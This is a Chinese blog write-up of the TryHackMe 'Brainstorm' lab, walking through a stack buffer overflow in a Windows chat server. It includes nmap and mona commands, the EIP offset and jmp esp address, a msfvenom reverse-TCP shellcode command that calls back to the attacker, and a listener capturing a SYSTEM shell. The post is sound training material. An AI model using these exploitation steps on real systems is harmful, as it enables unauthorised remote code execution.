TryHackMe-进攻性渗透测试-17_缓冲区溢出_Brainstorm

已于 2023-01-15 14:19:22 修改
阅读量237 收藏 1
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: windows 网络 服务器 网络安全 web安全
于 2022-12-27 23:54:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128462750
版权

Brainstorm

对聊天程序进行逆向工程并编写脚本以利用 Windows 计算机。

循例先扫,靶机禁ping,要加-Pn:

nmap -sS 10.10.190.110 -Pn -p- -T5

端口藏的深,需要 -p-

21/tcp   open  ftp
3389/tcp open  ms-wbt-server
9999/tcp open  abyss

用anonymous登录ftp,有料:

ftp> passive

08-29-19  09:26PM                43747 chatserver.exe
08-29-19  09:27PM                30761 essfunc.dll

ftp> binary

将这些文件下载。

由于我这里没有配置好的windows环境,就借用https://tryhackme.com/room/bufferoverflowprep这个房间的靶机来完成。

在win机器上运行这个exe,看命令行说是开了个服务,刚刚扫到个9999未知服务,用nmap -sV,nmap卡死了貌似。

用nc连接一下看看

提示:

Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters):

尝试了一下,username限死了20个字符,但是massage好像没限制,所以我们可以尝试对massage进行fuzzing

注意:我们需要先输入username后才能输入massage

丢到Immunity Debugger软件上,然后就可以按照我们刚刚学的缓冲区溢出技术进行操作了

!mona config -set workingfolder c:\mona\%p

然后open这个exe文件,进行fuzzing

注意:fuzz脚本的ip和端口是设置到win机器上,而不是我们这个房间的靶机,因为我们希望利用Immunity Debugger

fuzzing测到:

Fuzzing crashed at 2100 bytes

大概在2100上下

那么接下来就是找栈帧的(EIP)return address的具体位置:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500

!mona findmsp -distance 2500

结果:

EIP contains normal pattern : 0x31704330 (offset 2012)

我们知道的精确的位置:2012,接下来我们就只需填充2012长度的随机数据即可到return address

尝试在2012的位置后填充“BBBB”,成功覆盖EIP

寻找坏字符:

自己写个生成\x00-\xff的脚本

!mona bytearray -b "\x00"

!mona compare -f C:\mona\chatserver\bytearray.bin -a [esp address]

貌似并没有任何坏字符,除了\x00,这很棒,不用逐个逐个排查了。

找jmp esp地址

!mona jmp -r esp -cpb "\x00"

随便选一个

然后猜一手小端序:

"\xdf\x14\x50\x62 ------ 625014DF

使用该地址覆盖掉eip(return address)

生成shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c

将生成的shellcode添加到eip的后面

NOP

为了稳定,我们可以在shellcode之前,eip之后添加一点nop

"\x90" * 16

成功getshell

┌──(root💀kali)-[/home/sugobet]
└─# nc -vlnp 8888                                                         130 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 10.10.190.110.
Ncat: Connection from 10.10.190.110:49365.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

别忘了一件事,记得把exploit脚本的ip地址改回本房间的靶机!

Sugobet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MEG预处理-Brainstorm
AxeChen的博客
09-28 5075
Brainstorm下载和安装 去Brainstorm官网进行下载:打开网页后,点击左侧Download;在跳出来的界面中进行简单的注册,注册完成后可以进行下载 解压后得到“brainstorm3”的文件夹,里面包含Brainstorm工具包的所有文件,把这个文件夹放在某个路径如"E:\matlab_tools\brainstorm3"即可 同样在某个路径建立空的文件夹命名为:brainstorm_db用于工具包运行过程中自动存储生成的文件,所以这个文件中生成的数据不要手动移动删除 在Matlab中,把.
brainstorm常见报错-- compute head modle
kangkai311的博客
10-30 1035
使用brainstorm构建头模型(compute head modle)的时候,有时候会出现一段很长的报错警告。(报错代码附在本文最后) 根据每个用户设置的文件路径不同,报错的内容有些差异,但主体的报错内容应该是一样的。这时候可以采取以下三种方式解决: 1、以选择默认头模型为例,通常在compute head modle之前,要Genereta BEM surfaces,报错之后, 再一次Gen...
TryHackMe-进攻性渗透测试-16_缓冲区溢出
M1n9K1n9的博客
12-27 280
相对较难,需要有较好的计组底子缓冲区溢出基础:https://tryhackme.com/room/bof1关于国内的博客讲的非常好的一篇文章,讲的很透彻很仔细:https://www.cnblogs.com/02SWD/p/15952483.html。
TryHackMe学习笔记-Buffer Overflow Prep
网安星空
12-18 1478
TryHackMe靶场联系,PWN与逆向课程系列,Windows环境下的缓冲区溢出,也是OSCP教程的内容之一
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 311
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
TryHackMe-进攻性渗透测试-19_缓冲区溢出_Brainpan
M1n9K1n9的博客
12-28 659
rainpan非常适合OSCP练习,强烈建议在考试前完成。通过分析 Linux 计算机上可切割的 Windows exe 来利用缓冲区溢出漏洞。如果你被困在这台机器上,不要放弃(或看写),只要更加努力。这是一个定位难度:难 的房间,不过经过前面的缓冲区溢出练习,相信也不会有什么大问题循例,nmap扫nc都连一下,10000端口是web服务,9999不知道是什么东西,不过按照以往经验,这玩意铁定存在栈溢出漏洞既然开了web,我们循例也扫一下目录,因为主页就一张图片啥也没了。
靶机渗透练习09-driftingblues9
Force~
04-01 3384
靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) n.
use gnustep objective-c
m0_69086552的博客
08-06 2219
仅表示单个任务或行为单元而不是方法集合是有意义的(using block),它允许创建不同的代码段,这些代码段可以传递给方法或函数,就像它们是值一样。块是Objective-C对象,因此它们可以添加到NSArray或NSDictionary等集合中。它们还能够从封闭范围中捕获值,使其类似于其他编程语言中的闭包或lambda。
P3-Brainstorm::cloud_with_lightning_and_rain:
03-18
P3集思广益 :brain: :cloud_with_lightning_and_rain: 项目概况 您已经在小组中完成各种实验和练习,但是这次我们将挑战您与一个小组一起完成整个项目。 在设计自己的项目时,不仅会要求您发挥更多的创造力,导师还...
brainstorm-primary-24963:这个react_native应用程序是使用Crowdbotics www.crowdbotics.com构建的
03-11
Crowdbotics React Native支架 克隆此存储库后,您将需要安装依赖项: cd ProjectName yarn install 然后,您需要安装Podfile: cd ios pod install 安装所有依赖项以进行开发 请按照本指南进行操作,并为当前...
brainstorm_210711
08-05
在IT行业中,特别是在生物医学工程、神经科学和心理学领域,这样的项目通常涉及到对大脑活动的非侵入性监测。EEG是一种记录大脑电活动的技术,通过在头皮上放置电极来捕捉电信号,这些信号反映了大脑神经元的活动。 ...
matlabk-means源码-BrainStorm_CPP:cpp中的“头脑风暴优化”(BSO)核心。基于“煤矿运营风险管理分析”项目。摘自
05-24
经过测试,使用评价函数 z = sum( x(i)^2 + 10 - 10cos(2pi*x(i))),fitness效果与matlab基本一致。 经过10次重复实验,(参数在源码中) CPP: fitness 最小值为 2.287,平均值 6.4 matlab fitness 最小值1.988, ...
brainstorm_220911
09-12
《脑电图(EEG)信号处理与分析的MATLAB GUI工具——brainstorm_220911详解》 在神经科学的研究中,脑电图(EEG)和磁脑图(MEG)等非侵入式技术扮演着至关重要的角色。它们能够实时捕捉大脑活动,帮助科学家和医生...
初爽Stream流
最新发布
ADCvbV的博客
09-01 126
2.把“张”开头的,长度为3的元素再存储到新集合中。1.把所有以“张”开头的元素存储到新集合中。按照下面的要求完成集合的创建和遍历。创建一个集合,存储多个字符串元素。3.遍历打印最终结果。
CMake学习
qq_40052678的博客
08-29 1557
命令需要找到所有的文件,仍然很麻烦,因此有。所在的目录,会生成一系列文件,一般是在。单源文件可以直接命令生成.exe。就不需要了,只需要使用库文件就行。有了静态库和动态库之后,之前的。能使用计算器和排序,因此需要将。子节点可以使用父节点的变量值。假如目录结构如上图所示,其中。命令即可生成可执行文件。命令行直接编译源文件。里的内容生成库文件,在静态库中链接静态库。
Java—可变参数、不可变集合
向上的咸鱼blueblue的博客
08-27 936
本文介绍了Java中有关可变参数、不可变集合的相关内容。
二叉树遍历9道题
m0_56198792的博客
08-28 1017
题目链接:二叉树的右视图题目链接:二叉树的层平均值。
【python笔记】deque()、list()、heapq主要区别
weixin_45653183的博客
09-01 544
向堆中添加元素(heappush)和从堆中移除最小元素(heappop)的时间复杂度都是O(log n),其中n是堆中的元素数量。在列表的末尾添加或删除元素是高效的(O(1)),但在列表的开头或中间插入或删除元素则可能较慢(O(n)),因为需要移动其他元素。然而,在 deque 的中间插入或删除元素则可能较慢(O(n)),因为需要遍历链表来找到正确的位置,并可能需要移动多个节点。由于列表是基于数组的,因此它支持快速的随机访问,即可以在O(1)时间复杂度内通过索引访问列表中的任意元素。
brainstorm使用教程
09-05
Brainstorm是一款开源应用程序,用于分析脑部记录数据。它可以处理多种脑部记录数据,如MEG、EEG、fNIRS、ECoG等。尽管Brainstorm是使用Matlab和Java开发的,但用户不需要拥有Matlab许可证,因为可下载的软件包中已包含所需的组件。 在使用Brainstorm进行ERP数据解码时,可以利用其中的机器学习功能模块。这个模块提供了GUI操作界面,方便新手朋友上手使用。通过机器学习方法,可以对两种状态或者两组被试的ERP数据进行分类。 要安装Brainstorm,首先需要解压下载的文件,得到名为"brainstorm3"的文件夹。将该文件夹放置在指定的位置,例如D盘。 具体的使用教程可以参考Brainstorm官网的指导手册。手册提供了详细的说明和操作步骤,能够帮助用户进行ERP数据的导入、分析和解码等操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [brainstorm3:头脑风暴软件:MEG,EEG,fNIRS,ECoG,sEEG和电生理](https://download.csdn.net/download/weixin_42176612/15026115)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [利用Brainstorm软件进行ERP数据的解码](https://blog.csdn.net/weixin_41880581/article/details/106505578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [EEG/MEG数据处理工具包Brainstorm的下载与安装教程](https://blog.csdn.net/weixin_41880581/article/details/104781835)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值